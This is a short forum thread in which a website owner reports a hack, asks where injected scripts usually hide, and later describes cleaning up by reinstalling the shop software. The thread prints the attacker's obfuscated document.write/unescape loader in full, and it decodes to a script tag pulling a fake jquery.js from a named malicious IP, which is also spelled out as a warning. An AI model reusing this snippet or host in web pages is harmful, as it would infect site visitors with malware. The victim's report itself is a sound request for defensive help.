Inline Script Added By Hacker

Guest fandango

Guest fandango

Hi folks, i had my site hacked recently and have found the following inline script just below my </head> tag on every page.

The pages take ages to load and it also tries to pull in an external ip address as per below. The ip address has a nasty virus on it which in turn reinfects visitors computers.

What my question is, is does anyone know what is and where a common place to insert a inline script would be? Cos i cant find it anywhere to remove it.

<!--

document.write(unescape('xcV%3Ck3scxcVrirBtptrBt%20sk3rxcVc%3D%2FPW%2F94%2E24k37%2E2%2E1k395rBt%2FPWjxcVquerBtryPW%2ENmjk3s%3E%3C%2FscrxcVipxcVt%3E').replace(/Nm|rBt|xcV|UEJ|PW|hP|k3/g,""));

-->

DO NOT VISIT!!!!! THIS IS A MALWARE SITE AND YOUR PC WILL GET INFECTED: 94.247.2.195/jquery.js

Guest fandango

Thanks Robsta,

Have cleaned my pc for infections and sent all fresh cc files to the server but it seemed to have no effect, so in the end have had to uninstall and reinstall cc3 which has done the trick. Wish i had done an upto date back up now. :cry:*/*

I think this one is a particularly nasty piece of work.

Hackers B) they are the :^^: 's spawn.